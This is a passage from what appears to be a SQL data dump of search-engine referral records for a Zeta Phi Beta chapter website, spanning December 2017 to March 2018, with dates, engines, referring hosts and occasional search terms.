2017-12-18','google','www.google.com','',15671),(1207,'2017-12-18','google','www.google.com','',15672),(1208,'2017-12-18','google','www.google.com','',15673),(1209,'2017-12-18','google','www.google.com','',15675),(1210,'2017-12-18','google','www.google.com','',15690),(1211,'2017-12-18','google','www.google.com','',15691),(1212,'2017-12-18','google','www.google.com','',15693),(1213,'2017-12-18','google','www.google.com','',15695),(1214,'2017-12-19','google','www.google.com','',15760),(1215,'2017-12-19','google','www.google.com','',15761),(1216,'2017-12-19','google','www.google.com','',15764),(1217,'2017-12-19','google','www.google.com','',15765),(1218,'2017-12-19','google','www.google.com','',15766),(1219,'2017-12-19','google','www.google.com','',15767),(1220,'2017-12-19','google','www.google.com','',15772),(1221,'2017-12-19','google','www.google.co.nz','',15836),(1222,'2017-12-20','google','www.google.com','',15941),(1223,'2017-12-20','google','www.google.co.jp','',15959),(1224,'2017-12-20','google','www.google.com','',15960),(1225,'2017-12-20','google','www.google.com','',15962),(1226,'2017-12-21','google','www.google.com','',16025),(1227,'2017-12-21','google','www.google.com','',16043),(1228,'2017-12-22','google','www.google.com','zphiblgz.org',16058),(1229,'2017-12-22','google','www.google.com','',16060),(1230,'2017-12-22','google','www.google.com','',16061),(1231,'2017-12-22','yandex','yandex.ru','',16097),(1232,'2017-12-22','google','www.google.com','',16098),(1233,'2017-12-23','google','www.google.com','',16154),(1234,'2017-12-23','yahoo','search.yahoo.com','',16156),(1235,'2017-12-23','google','www.google.com','',16165),(1236,'2017-12-23','google','www.google.com','',16177),(1237,'2017-12-24','google','www.google.com','',16196),(1238,'2017-12-24','yandex','yandex.ru','',16212),(1239,'2017-12-25','yandex','yandex.ru','',16224),(1240,'2017-12-25','yandex','yandex.ru','',16231),(1241,'2017-12-25','google','www.google.com','',16238),(1242,'2017-12-25','google','www.google.com','',16239),(1243,'2017-12-25','google','www.google.com','',16246),(1244,'2017-12-25','google','www.google.com','',16247),(1245,'2017-12-25','google','www.google.com','',16248),(1246,'2017-12-25','google','www.google.com','',16250),(1247,'2017-12-25','google','www.google.com','',16268),(1248,'2017-12-26','google','www.google.com','',16468),(1249,'2018-01-07','google','www.google.com','',16485),(1250,'2018-01-07','google','www.google.com','',16490),(1251,'2018-01-07','google','www.google.co.jp','',16500),(1252,'2018-01-07','google','www.google.co.jp','',16504),(1253,'2018-01-08','google','www.google.com','',16506),(1254,'2018-01-08','google','www.google.com','',16525),(1255,'2018-01-08','google','www.google.co.jp','',16528),(1256,'2018-01-08','google','www.google.com','',16537),(1257,'2018-01-08','google','www.google.com','',16538),(1258,'2018-01-08','google','www.google.com','',16545),(1259,'2018-01-08','google','www.google.com','',16563),(1260,'2018-01-08','google','google.com','',16570),(1261,'2018-01-09','google','www.google.com','',16605),(1262,'2018-01-09','google','www.google.com','',16606),(1263,'2018-01-09','google','www.google.com','',16607),(1264,'2018-01-09','google','www.google.com','',16625),(1265,'2018-01-09','google','www.google.com','',16627),(1266,'2018-01-09','google','www.google.com','',16634),(1267,'2018-01-10','google','www.google.com','',16642),(1268,'2018-01-10','google','www.google.com','',16644),(1269,'2018-01-10','google','www.google.com','',16645),(1270,'2018-01-10','google','www.google.com','',16647),(1271,'2018-01-10','google','www.google.com','',16676),(1272,'2018-01-10','google','www.google.com','',16678),(1273,'2018-01-10','google','www.google.com','',16679),(1274,'2018-01-10','google','www.google.com','',16681),(1275,'2018-01-10','google','www.google.com','',16687),(1276,'2018-01-10','google','www.google.com','',16689),(1277,'2018-01-10','google','www.google.com','',16690),(1278,'2018-01-10','google','www.google.com','',16691),(1279,'2018-01-10','google','www.google.com','',16692),(1280,'2018-01-11','google','www.google.com','',16731),(1281,'2018-01-11','google','www.google.com','',16735),(1282,'2018-01-11','google','www.google.com','',16736),(1283,'2018-01-11','google','www.google.com','',16740),(1284,'2018-01-12','google','www.google.com','',16754),(1285,'2018-01-12','google','www.google.com','',16763),(1286,'2018-01-12','google','www.google.com','',16769),(1287,'2018-01-12','google','www.google.com','',16787),(1288,'2018-01-12','google','www.google.com','',16794),(1289,'2018-01-12','google','www.google.com','',16795),(1290,'2018-01-12','google','www.google.co.jp','',16800),(1291,'2018-01-13','google','www.google.com','',16820),(1292,'2018-01-13','google','www.google.com','',16824),(1293,'2018-01-13','yandex','yandex.ru','',16825),(1294,'2018-01-13','yandex','yandex.ru','',16826),(1295,'2018-01-13','google','www.google.com','',16830),(1296,'2018-01-13','google','www.google.com','',16831),(1297,'2018-01-13','google','www.google.com','',16841),(1298,'2018-01-14','google','www.google.com','',16863),(1299,'2018-01-14','google','www.google.com','',16877),(1300,'2018-01-14','google','www.google.com','',16878),(1301,'2018-01-14','google','www.google.com','',16880),(1302,'2018-01-14','google','www.google.co.jp','',16888),(1303,'2018-01-15','google','www.google.com','',16907),(1304,'2018-01-15','bing','www.bing.com','',16923),(1305,'2018-01-15','google','www.google.com','',16925),(1306,'2018-01-15','google','www.google.com','',16935),(1307,'2018-01-15','google','www.google.com','',16936),(1308,'2018-01-15','google','www.google.com','',16937),(1309,'2018-01-15','google','www.google.com','',16941),(1310,'2018-01-15','google','www.google.com','',16951),(1311,'2018-01-16','google','www.google.co.jp','',16952),(1312,'2018-01-16','google','www.google.com','',16973),(1313,'2018-01-16','yandex','yandex.ru','',16979),(1314,'2018-01-16','google','www.google.com','',16982),(1315,'2018-01-16','google','www.google.com','',16986),(1316,'2018-01-16','bing','www.bing.com','amazon',16987),(1317,'2018-01-16','google','www.google.com','',16989),(1318,'2018-01-16','google','www.google.com','',16996),(1319,'2018-01-16','google','com.google.android.googlequicksearchbox','',16999),(1320,'2018-01-16','yandex','yandex.ru','',17001),(1321,'2018-01-16','google','www.google.com','',17004),(1322,'2018-01-16','google','www.google.com','',17005),(1323,'2018-01-16','google','www.google.com','',17007),(1324,'2018-01-16','google','www.google.com','',17015),(1325,'2018-01-16','google','www.google.com','',17016),(1326,'2018-01-16','google','www.google.com','',17017),(1327,'2018-01-16','google','www.google.com','',17018),(1328,'2018-01-16','google','www.google.com','',17030),(1329,'2018-01-16','yahoo','search.yahoo.com','',17032),(1330,'2018-01-16','google','www.google.com','',17035),(1331,'2018-01-16','google','www.google.com','',17036),(1332,'2018-01-16','google','www.google.com','',17037),(1333,'2018-01-16','google','www.google.com','',17039),(1334,'2018-01-16','google','www.google.com','',17041),(1335,'2018-01-16','google','www.google.com','',17042),(1336,'2018-01-17','bing','www.bing.com','amazon',17065),(1337,'2018-01-17','google','www.google.com','',17070),(1338,'2018-01-17','google','www.google.com','',17071),(1339,'2018-01-17','google','www.google.com','',17077),(1340,'2018-01-17','google','www.google.com','',17080),(1341,'2018-01-17','google','www.google.com','',17102),(1342,'2018-01-18','google','www.google.com','',17129),(1343,'2018-01-18','google','www.google.com','',17148),(1344,'2018-01-18','google','www.google.com','',17149),(1345,'2018-01-18','google','www.google.co.jp','',17163),(1346,'2018-01-18','google','www.google.com','',17175),(1347,'2018-01-19','google','www.google.com','',17196),(1348,'2018-01-19','yahoo','search.yahoo.com','',17202),(1349,'2018-01-19','google','com.google.android.gm','',17212),(1350,'2018-01-19','google','www.google.com','',17215),(1351,'2018-01-19','google','www.google.com','',17217),(1352,'2018-01-19','google','www.google.com','',17219),(1353,'2018-01-20','yahoo','search.yahoo.com','',17232),(1354,'2018-01-20','yandex','yandex.ru','',17237),(1355,'2018-01-20','google','www.google.com','',17242),(1356,'2018-01-20','google','www.google.com','',17247),(1357,'2018-01-20','google','www.google.com','',17249),(1358,'2018-01-20','yandex','yandex.ru','',17254),(1359,'2018-01-20','google','www.google.com','',17278),(1360,'2018-01-20','yandex','yandex.ru','',17299),(1361,'2018-01-21','google','com.google.android.googlequicksearchbox','',17310),(1362,'2018-01-21','google','www.google.com','',17324),(1363,'2018-01-21','google','www.google.com','',17335),(1364,'2018-01-21','google','www.google.com','',17339),(1365,'2018-01-21','google','www.google.com','',17344),(1366,'2018-01-22','google','www.google.com','',17359),(1367,'2018-01-22','google','www.google.com','',17377),(1368,'2018-01-22','google','www.google.com','',17380),(1369,'2018-01-22','google','www.google.com','',17383),(1370,'2018-01-22','google','www.google.com','',17404),(1371,'2018-01-22','bing','www.bing.com','',17406),(1372,'2018-01-23','google','www.google.com','',17441),(1373,'2018-01-23','google','www.google.com','',17444),(1374,'2018-01-23','google','www.google.com','',17446),(1375,'2018-01-23','google','www.google.com','',17447),(1376,'2018-01-23','google','www.google.com','',17448),(1377,'2018-01-23','google','www.google.com','',17449),(1378,'2018-01-23','google','www.google.com','',17451),(1379,'2018-01-23','google','www.google.com','',17457),(1380,'2018-01-23','google','www.google.com','',17460),(1381,'2018-01-23','google','www.google.com','',17463),(1382,'2018-01-23','baidu','www.baidu.com','MAA',17468),(1383,'2018-01-23','google','www.google.com','',17472),(1384,'2018-01-24','google','www.google.com','',17480),(1385,'2018-01-24','google','www.google.com.ph','',17515),(1386,'2018-01-24','google','www.google.com','',17519),(1387,'2018-01-24','google','www.google.com','',17523),(1388,'2018-01-24','yandex','yandex.ru','',17532),(1389,'2018-01-24','yandex','yandex.ru','',17539),(1390,'2018-01-24','yandex','yandex.ru','',17542),(1391,'2018-01-25','google','www.google.com','',17554),(1392,'2018-01-25','google','www.google.com','',17557),(1393,'2018-01-25','google','www.google.com','',17569),(1394,'2018-01-25','google','www.google.com','',17581),(1395,'2018-01-25','google','www.google.com','',17592),(1396,'2018-01-25','baidu','www.baidu.com','P56L',17610),(1397,'2018-01-25','yandex','yandex.ru','',17611),(1398,'2018-01-25','yandex','yandex.ru','',17612),(1399,'2018-01-25','google','www.google.com','',17615),(1400,'2018-01-26','baidu','www.baidu.com','V85',17642),(1401,'2018-01-26','google','www.google.com','',17647),(1402,'2018-01-26','google','www.google.com','',17648),(1403,'2018-01-26','bing','www.bing.com','',17655),(1404,'2018-01-26','google','www.google.com','',17657),(1405,'2018-01-26','bing','www.bing.com','a pretty and polished affair beccas closet md',17664),(1406,'2018-01-26','bing','www.bing.com','a pretty and polished affair beccas closet md',17667),(1407,'2018-01-27','google','www.google.com','',17683),(1408,'2018-01-27','google','www.google.com','',17709),(1409,'2018-01-27','yahoo','r.search.yahoo.com','',17730),(1410,'2018-01-28','google','www.google.com','',17763),(1411,'2018-01-28','google','www.google.com','',17766),(1412,'2018-01-28','google','www.google.com','',17770),(1413,'2018-01-28','google','www.google.com','',17771),(1414,'2018-01-28','google','www.google.com','',17777),(1415,'2018-01-28','google','www.google.com','',17784),(1416,'2018-01-29','google','www.google.com','',17799),(1417,'2018-01-29','google','translate.google.com','',17802),(1418,'2018-01-29','google','www.google.com','',17820),(1419,'2018-01-29','google','www.google.com','',17824),(1420,'2018-01-29','google','www.google.com','',17829),(1421,'2018-01-29','yahoo','search.yahoo.com','',17830),(1422,'2018-01-29','google','www.google.com','',17831),(1423,'2018-01-29','google','google.com','',17836),(1424,'2018-01-29','google','www.google.com','',17840),(1425,'2018-01-29','google','www.google.co.jp','',17843),(1426,'2018-01-29','google','www.google.com','zphiblgz.org',17845),(1427,'2018-01-30','bing','www.bing.com','',17876),(1428,'2018-01-30','google','www.google.com','',17879),(1429,'2018-01-30','google','www.google.com','',17882),(1430,'2018-01-30','google','www.google.com','',17924),(1431,'2018-01-30','google','www.google.com','',18008),(1432,'2018-01-31','google','www.google.com','',18058),(1433,'2018-01-31','google','www.google.com','',18062),(1434,'2018-01-31','google','www.google.com','',18063),(1435,'2018-01-31','google','www.google.com','',18064),(1436,'2018-01-31','yandex','yandex.ru','',18077),(1437,'2018-01-31','google','www.google.com','',18168),(1438,'2018-01-31','google','www.google.com','',18245),(1439,'2018-02-01','google','www.google.co.jp','',18323),(1440,'2018-02-01','yandex','yandex.ru','',18327),(1441,'2018-02-01','google','www.google.com','',18363),(1442,'2018-02-01','google','www.google.com','',18402),(1443,'2018-02-01','google','www.google.com','',18413),(1444,'2018-02-01','google','www.google.com','',18465),(1445,'2018-02-01','google','www.google.com','',18466),(1446,'2018-02-02','google','www.google.com','',18527),(1447,'2018-02-02','google','www.google.com','',18539),(1448,'2018-02-02','google','www.google.com','',18649),(1449,'2018-02-02','google','www.google.com','',18658),(1450,'2018-02-02','google','www.google.com','',18727),(1451,'2018-02-03','google','www.google.com.pk','',18781),(1452,'2018-02-03','google','www.google.co.jp','',18788),(1453,'2018-02-03','yandex','yandex.ru','',18899),(1454,'2018-02-03','google','www.google.com','',18905),(1455,'2018-02-04','google','www.google.com','',19147),(1456,'2018-02-04','google','www.google.com','',19174),(1457,'2018-02-04','google','www.google.com','',19209),(1458,'2018-02-04','google','www.google.com','https://zphiblgz.org/scholarship/application/',19214),(1459,'2018-02-05','bing','www.bing.com','',19351),(1460,'2018-02-05','google','www.google.com','',19363),(1461,'2018-02-05','google','www.google.com','',19364),(1462,'2018-02-05','google','www.google.com','',19379),(1463,'2018-02-05','google','www.google.com','',19404),(1464,'2018-02-05','google','www.google.com','',19408),(1465,'2018-02-05','yandex','yandex.ru','',19420),(1466,'2018-02-05','google','www.google.com','',19427),(1467,'2018-02-05','google','www.google.com','',19460),(1468,'2018-02-05','google','www.google.com','',19500),(1469,'2018-02-06','google','www.google.com','',19555),(1470,'2018-02-06','google','www.google.com','',19591),(1471,'2018-02-06','google','www.google.com','',19600),(1472,'2018-02-06','google','www.google.com','',19601),(1473,'2018-02-06','google','www.google.com','',19623),(1474,'2018-02-06','yandex','yandex.ru','',19624),(1475,'2018-02-06','google','www.google.com','',19642),(1476,'2018-02-06','google','www.google.com','zeta phi beta graduate chapters in maryland',19709),(1477,'2018-02-06','google','www.google.com','',19726),(1478,'2018-02-06','google','www.google.com','',19727),(1479,'2018-02-07','google','www.google.com','',19887),(1480,'2018-02-07','google','www.google.com','',19892),(1481,'2018-02-08','yahoo','r.search.yahoo.com','',20067),(1482,'2018-02-08','google','www.google.com','',20116),(1483,'2018-02-08','google','www.google.com','',20136),(1484,'2018-02-08','google','www.google.com','',20159),(1485,'2018-02-08','google','www.google.com','',20168),(1486,'2018-02-08','bing','www.bing.com','',20179),(1487,'2018-02-08','yahoo','search.yahoo.com','',20206),(1488,'2018-02-08','yahoo','r.search.yahoo.com','',20246),(1489,'2018-02-09','google','www.google.com','',20300),(1490,'2018-02-09','bing','www.bing.com','amazon',20351),(1491,'2018-02-09','google','www.google.com','',20435),(1492,'2018-02-09','google','www.google.com','',20455),(1493,'2018-02-09','google','www.google.com','',20547),(1494,'2018-02-10','google','www.google.com','',20582),(1495,'2018-02-10','yandex','yandex.ru','',20634),(1496,'2018-02-10','yandex','yandex.ru','',20635),(1497,'2018-02-10','google','www.google.com','',20647),(1498,'2018-02-10','google','www.google.com','',20718),(1499,'2018-02-10','google','www.google.com','',20733),(1500,'2018-02-10','yandex','yandex.ru','',20849),(1501,'2018-02-11','google','www.google.com','',20973),(1502,'2018-02-11','google','www.google.com','',20980),(1503,'2018-02-11','google','www.google.com','',21003),(1504,'2018-02-11','yahoo','r.search.yahoo.com','',21029),(1505,'2018-02-11','google','www.google.com','',21060),(1506,'2018-02-11','google','www.google.com','',21157),(1507,'2018-02-12','google','www.google.com','',21163),(1508,'2018-02-12','google','www.google.com','',21226),(1509,'2018-02-12','bing','www.bing.com','',21305),(1510,'2018-02-12','google','www.google.com','',21306),(1511,'2018-02-12','google','www.google.com','',21307),(1512,'2018-02-12','google','www.google.com','',21463),(1513,'2018-02-13','google','www.google.com','',21548),(1514,'2018-02-13','google','www.google.com','',21576),(1515,'2018-02-13','google','www.google.com','',21600),(1516,'2018-02-13','google','www.google.com','',21635),(1517,'2018-02-13','google','www.google.com','',21636),(1518,'2018-02-14','google','www.google.com','',21763),(1519,'2018-02-14','google','www.google.com','',21779),(1520,'2018-02-14','google','www.google.com','',21780),(1521,'2018-02-14','google','www.google.com','',21824),(1522,'2018-02-14','google','www.google.co.th','',21964),(1523,'2018-02-14','google','www.google.com','',21972),(1524,'2018-02-14','google','www.google.com','',21973),(1525,'2018-02-15','google','www.google.com','',22056),(1526,'2018-02-15','google','www.google.com','',22117),(1527,'2018-02-15','google','www.google.com','',22139),(1528,'2018-02-15','google','www.google.com','',22262),(1529,'2018-02-16','google','www.google.com','',22344),(1530,'2018-02-16','google','google.com','',22415),(1531,'2018-02-16','google','www.google.com','',22448),(1532,'2018-02-16','google','www.google.com','',22466),(1533,'2018-02-16','google','www.google.com','',22493),(1534,'2018-02-16','google','www.google.com','',22548),(1535,'2018-02-17','yandex','yandex.ru','',22622),(1536,'2018-02-17','yahoo','r.search.yahoo.com','',22665),(1537,'2018-02-17','google','www.google.com','',22671),(1538,'2018-02-17','google','www.google.com','',22691),(1539,'2018-02-17','bing','www.bing.com','',22695),(1540,'2018-02-17','google','www.google.com','',22752),(1541,'2018-02-17','google','com.google.android.googlequicksearchbox','',22757),(1542,'2018-02-17','yahoo','r.search.yahoo.com','',22809),(1543,'2018-02-17','google','www.google.com','',22883),(1544,'2018-02-18','google','www.google.com','zphiblgz.org',22902),(1545,'2018-02-18','google','www.google.com','zphiblgz.org',22904),(1546,'2018-02-18','google','www.google.com','zphiblgz.org',22903),(1547,'2018-02-18','google','www.google.com','zphiblgz.org',22908),(1548,'2018-02-18','google','www.google.com','zphiblgz.org',22909),(1549,'2018-02-18','google','www.google.com','zphiblgz.org',22910),(1550,'2018-02-18','google','www.google.com','',22970),(1551,'2018-02-18','google','www.google.com','',23042),(1552,'2018-02-18','google','www.google.com','',23076),(1553,'2018-02-18','yahoo','search.yahoo.com','',23116),(1554,'2018-02-18','yahoo','r.search.yahoo.com','',23144),(1555,'2018-02-18','bing','www.bing.com','',23162),(1556,'2018-02-19','google','www.google.com','',23196),(1557,'2018-02-19','yahoo','r.search.yahoo.com','',23218),(1558,'2018-02-19','yahoo','r.search.yahoo.com','',23221),(1559,'2018-02-19','google','www.google.ca','',23225),(1560,'2018-02-19','google','www.google.com','',23305),(1561,'2018-02-19','yahoo','search.yahoo.com','',23334),(1562,'2018-02-19','google','com.google.android.googlequicksearchbox','',23407),(1563,'2018-02-19','google','www.google.com','',23418),(1564,'2018-02-19','google','www.google.com','',23431),(1565,'2018-02-20','yandex','yandex.ru','',23477),(1566,'2018-02-20','google','www.google.co.jp','',23505),(1567,'2018-02-20','google','www.google.com','',23506),(1568,'2018-02-20','yahoo','r.search.yahoo.com','',23544),(1569,'2018-02-20','google','www.google.com','lambda gamma zeta chapter',23560),(1570,'2018-02-20','google','www.google.com','',23601),(1571,'2018-02-20','google','www.google.com','',23616),(1572,'2018-02-20','google','www.google.com','',23682),(1573,'2018-02-20','google','www.google.com','',23711),(1574,'2018-02-20','google','www.google.com','',23720),(1575,'2018-02-21','bing','www.bing.com','',23858),(1576,'2018-02-21','google','www.google.com','',23859),(1577,'2018-02-21','google','www.google.com','',23881),(1578,'2018-02-21','google','www.google.com','',23882),(1579,'2018-02-21','google','www.google.com','',23892),(1580,'2018-02-21','google','www.google.com','',23989),(1581,'2018-02-22','google','www.google.com','',24068),(1582,'2018-02-22','google','www.google.com','',24080),(1583,'2018-02-22','google','www.google.com','',24121),(1584,'2018-02-22','google','www.google.com','',24151),(1585,'2018-02-22','google','www.google.com','',24194),(1586,'2018-02-22','bing','www.bing.com','',24203),(1587,'2018-02-22','google','www.google.com','',24204),(1588,'2018-02-23','google','com.google.android.googlequicksearchbox','',24296),(1589,'2018-02-23','google','www.google.com','',24350),(1590,'2018-02-23','google','www.google.com','',24396),(1591,'2018-02-23','bing','www.bing.com','',24399),(1592,'2018-02-23','google','www.google.com','',24510),(1593,'2018-02-23','yandex','yandex.ru','',24525),(1594,'2018-02-23','yandex','yandex.ru','',24526),(1595,'2018-02-24','google','www.google.com','',24558),(1596,'2018-02-24','google','www.google.com','',24568),(1597,'2018-02-24','google','www.google.com','',24674),(1598,'2018-02-24','yandex','yandex.ru','',24693),(1599,'2018-02-24','google','www.google.com','',24708),(1600,'2018-02-24','google','www.google.com','',24752),(1601,'2018-02-24','google','www.google.com','',24806),(1602,'2018-02-24','google','www.google.com','',24827),(1603,'2018-02-25','google','www.google.com','',24891),(1604,'2018-02-25','google','www.google.com','',24920),(1605,'2018-02-25','google','www.google.com','',24928),(1606,'2018-02-25','google','www.google.com','',24935),(1607,'2018-02-25','google','www.google.com','',25021),(1608,'2018-02-25','google','www.google.com','',25052),(1609,'2018-02-25','google','www.google.com','',25069),(1610,'2018-02-25','google','www.google.com','',25075),(1611,'2018-02-25','google','www.google.com','',25090),(1612,'2018-02-25','google','www.google.com','',25137),(1613,'2018-02-26','google','www.google.com','',25193),(1614,'2018-02-26','google','www.google.com','',25203),(1615,'2018-02-26','yahoo','search.yahoo.com','',25204),(1616,'2018-02-26','google','www.google.com','',25234),(1617,'2018-02-26','google','www.google.com','',25236),(1618,'2018-02-26','google','www.google.com','',25237),(1619,'2018-02-26','google','www.google.com','',25238),(1620,'2018-02-26','google','www.google.com','',25248),(1621,'2018-02-26','google','www.google.com','',25249),(1622,'2018-02-26','google','www.google.com','',25254),(1623,'2018-02-26','google','www.google.com','',25281),(1624,'2018-02-26','yandex','yandex.ru','',25297),(1625,'2018-02-26','google','www.google.com','',25334),(1626,'2018-02-26','google','www.google.com','',25336),(1627,'2018-02-26','google','www.google.com','',25348),(1628,'2018-02-26','google','www.google.com','',25447),(1629,'2018-02-27','google','www.google.com','',25487),(1630,'2018-02-27','google','www.google.com','',25518),(1631,'2018-02-27','google','www.google.com','',25528),(1632,'2018-02-27','google','www.google.com','',25549),(1633,'2018-02-27','yandex','yandex.ru','',25556),(1634,'2018-02-27','google','www.google.com','',25567),(1635,'2018-02-27','yahoo','search.yahoo.com','',25576),(1636,'2018-02-27','google','www.google.com','',25592),(1637,'2018-02-27','google','www.google.com','',25604),(1638,'2018-02-28','google','www.google.com','',25617),(1639,'2018-02-28','yahoo','r.search.yahoo.com','',25619),(1640,'2018-02-28','google','www.google.com','',25622),(1641,'2018-02-28','google','www.google.com','',25625),(1642,'2018-02-28','google','www.google.com','',25666),(1643,'2018-02-28','google','www.google.com','',25677),(1644,'2018-02-28','google','www.google.com','',25682),(1645,'2018-02-28','google','www.google.com','',25683),(1646,'2018-02-28','google','com.google.android.googlequicksearchbox','',25691),(1647,'2018-03-01','google','www.google.com','',25700),(1648,'2018-03-01','google','www.google.com','',25723),(1649,'2018-03-01','google','www.google.com','',25725),(1650,'2018-03-01','google','www.google.com','',25745),(1651,'2018-03-01','google','www.google.com','',25750),(1652,'2018-03-01','google','www.google.com','',25757),(1653,'2018-03-01','google','www.google.com','',25759),(1654,'2018-03-01','google','www.google.com','',25761),(1655,'2018-03-02','yandex','yandex.ru','',25783),(1656,'2018-03-02','google','www.google.com','',25802),(1657,'2018-03-02','yandex','yandex.ru','',25811),(1658,'2018-03-02','google','www.google.co.jp','',25820),(1659,'2018-03-03','google','www.google.com','',25856),(1660,'2018-03-03','google','www.google.com','',25860),(1661,'2018-03-03','google','www.google.com','',25863),(1662,'2018-03-03','google','www.google.com','',25881),(1663,'2018-03-04','google','www.google.com','',25914),(1664,'2018-03-04','google','www.google.com','',25923),(1665,'2018-03-04','yandex','yandex.ru','',25943),(1666,'2018-03-04','google','www.google.com','',25954),(1667,'2018-03-05','yandex','yandex.ru','',25971),(1668,'2018-03-05','google','www.google.com','',25979),(1669,'2018-03-05','bing','www.bing.com','',26005),(1670,'2018-03-06','bing','www.bing.com','',26051),(1671,'2018-03-06','google','www.google.com','',26052),(1672,'2018-03-06','google','www.google.com','',26066),(1673,'2018-03-06','google','www.google.com','',26067),(1674,'2018-03-06','yandex','yandex.ru','',26068),(1675,'2018-03-07','google','www.google.com','',26106),(1676,'2018-03-07','google','www.google.com','',26110),(1677,'2018-03-07','yahoo','r.search.yahoo.com','',26111),(1678,'2018-03-07','google','www.google.com','',26112),(1679,'2018-03-07','google','www.google.com','',26119),(1680,'2018-03-07','yandex','yandex.ru','',26128),(1681,'2018-03-08','bing','www.bing.com','',26161),(1682,'2018-03-08','google','www.google.com','',26169),(1683,'2018-03-08','google','www.google.com','',26170),(1684,'2018-03-08','bing','www.bing.com','',26177),(1685,'2018-03-08','google','www.google.com','',26187),(1686,'2018-03-08','google','www.google.com','',26189),(1687,'2018-03-08','google','www.google.com','',26191),(1688,'2018-03-09','yandex','yandex.ru','',26209),(1689,'2018-03-09','google','www.google.com.ph','',26224),(1690,'2018-03-09','google','www.google.com','',26239),(1691,'2018-03-09','google','www.google.com','',26248),(1692,'2018-03-09','google','www.google.com','',26254),(1693,'2018-03-09','google','www.google.com','',26260),(1694,'2018-03-09','google','www.google.com','',26269),(1695,'2018-03-10','google','www.google.com','',26278),(1696,'2018-03-10','google','www.google.com','',26279),(1697,'2018-03-10','google','www.google.com','',26284),(1698,'2018-03-10','google','www.google.com','zphiblgz.org',26288),(1699,'2018-03-10','google','www.google.com','',26301),(1700,'2018-03-10','google','www.google.com','',26320),(1701,'2018-03-11','google','www.google.com','',26343),(1702,'2018-03-11','google','www.google.com','',26349),(1703,'2018-03-11','google','www.google.com','',26371),(1704,'2018-03-11','yandex','yandex.ru','',26374),(1705,'2018-03-12','google','www.google.com','',26399),(1706,'2018-03-12','google','www.google.com','',26418),(1707,'2018-03-12','google','www.google.com','',26425),(1708,'2018-03-12','yahoo','search.yahoo.com','',26430),(1709,'2018-03-12','google','www.google.com','',26432),(1710,'2018-03-12','google','www.google.com','',26436),(1711,'2018-03-13','google','www.google.com','',26450),(1712,'2018-03-13','google','www.google.com','',26462),(1713,'2018-03-13','google','www.google.com','',26468),(1714,'2018-03-13','google','www.google.com','',26481),(1715,'2018-03-13','google','www.google.com','',26482),(1716,'2018-03-13','google','www.google.com','',26489),(1717,'2018-03-13','google','www.google.com','',26491),(1718,'2018-03-13','google','www.google.com','',26494),(1719,'2018-03-13','google','www.google.com','',26498),(1720,'2018-03-13','google','www.google.com','',26502),(1721,'2018-03-13','google','www.google.com','',26515),(1722,'2018-03-13','yahoo','mail.yahoo.com','',26518),(1723,'2018-03-14','google','www.google.com','',26540),(1724,'2018-03-14','google','www.google.com','',26542),(1725,'2018-03-14','google','www.google.com','',26551),(1726,'2018-03-14','google','www.google.com','',26558),(1727,'2018-03-14','google','www.google.com','',26561),(1728,'2018-03-14','google','www.google.com','',26571),(1729,'2018-03-14','google','www.google.be','',26573),(1730,'2018-03-14','google','www.google.com','',26590),(1731,'2018-03-15','google','www.google.com','',26623),(1732,'2018-03-15','google','www.google.com','',26648),(1733,'2018-03-15','google','www.google.com','',26655),(1734,'2018-03-15','google','www.google.com','',26660),(1735,'2018-03-15','google','www.google.com','',26674),(1736,'2018-03-15','google','www.google.com','',26690),(1737,'2018-03-16','google','www.google.com','',26710),(1738,'2018-03-16','google','www.google.com','',26739),(1739,'2018-03-16','google','www.google.com','',26755),(1740,'2018-03-16','bing','www.bing.com','',26764),(1741,'2018-03-17','google','www.google.com','',26795),(1742,'2018-03-17','google','www.google.com','',26797),(1743,'2018-03-17','google','www.google.com','',26798),(1744,'2018-03-17','google','www.google.com','',26804),(1745,'2018-03-17','google','www.google.com','',26809),(1746,'2018-03-17','google','www.google.com','',26812),(1747,'2018-03-18','google','www.google.com','',26852),(1748,'2018-03-18','google','www.google.com','',26867),(1749,'2018-03-18','google','www.google.com','',26874),(1750,'2018-03-18','google','www.google.com','',26883),(1751,'2018-03-18','google','www.google.com','',26890),(1752,'2018-03-19','google','www.google.com','',26921),(1753,'2018-03-19','google','www.google.com','',26935),(1754,'2018-03-20','yandex','yandex.ru','',26951),(1755,'2018-03-20','google','www.google.com','',26984),(1756,'2018-03-20','bing','www.bing.com','',26985),(1757,'2018-03-20','google','www.google.com','',26987),(1758,'2018-03-20','bing','www.bing.com','',26990),(1759,'2018-03-20','yandex','yandex.ru','',27012),(1760,'2018-03-20','google','www.google.com','',27015),(1761,'2018-03-20','google','www.google.com','',27018),(1762,'2018-03-20','google','www.google.com','',27020),(1763,'2018-03-20','google','www.google.com','',27022),(1764,'2018-03-20','google','www.google.com','',27026),(1765,'2018-03-21','google','com.google.android.googlequicksearchbox','',27044),(1766,'2018-03-21','bing','www.bing.com','amazon',27052),(1767,'2018-03-21','google','www.google.com','',27059),(1768,'2018-03-21','bing','www.bing.com','',27063),(1769,'2018-03-21','google','www.google.com','',27065),(1770,'2018-03-21','google','www.google.com','',27067),(1771,'2018-03-21','google','www.google.com','',27068),(1772,'2018-03-21','google','www.google.com','',27069),(1773,'2018-03-21','google','www.google.com','',27072),(1774,'2018-03-21','google','www.google.com','',27081),(1775,'2018-03-21','google','www.google.com','',27100),(1776,'2018-03-21','google','www.google.com','',27104),(1777,'2018-03-22','google','www.google.com','',27173),(1778,'2018-03-22','google','www.google.com','',27182),(1779,'2018-03-22','google','com.google.android.gm','',27187),(1780,'2018-03-22','google','www.google.com','',27207),(1781,'2018-03-23','google','www.google.com','',27262),(1782,'2018-03-23','google','www.google.com','mary bell - zeta phi beta xi gamma chapter',27273),(1783,'2018-03-23','google','www.google.com','',27289),(1784,'2018-03-24','google','www.google.com','',27314),(1785,'2018-03-24','google','www.google.com','',27318),(1786,'2018-03-24','google','www.google.com','',27319),(1787,'2018-03-24','google','www.google.com','',27323),(1788,'2018-03-24','google','www.google.com','',27325),(1789,'2018-03-24','google','www.google.com','',27334),(1790,'2018-03-25','google','www.google.com','',27390),(1791,'2018-03-25','bing','www.bing.com','',27416),(1792,'2018-03-25','google','www.google.com','',27417),(1793,'2018-03-25','google','www.google.com','',27418),(1794,'2018-03-25','google','www.google.com','',27419),(1795,'2018-03-25','google','www.google.com','',27428),(1796,'2018-03-25','google','www.google.com','',27430),(1797,'2018-03-25','google','www.google.com','',27432),(1798,'2018-03-25','google','www.google.com','',27449),(1799,'2018-03-26','google','www.google.com','',27468),(1800,'2018-03-26','google','www.google.com','',27477),(1801,'2018-03-26','google','www.google.com','',27484),(1802,'2018-03-26','google','www.google.com','',27490),(1803,'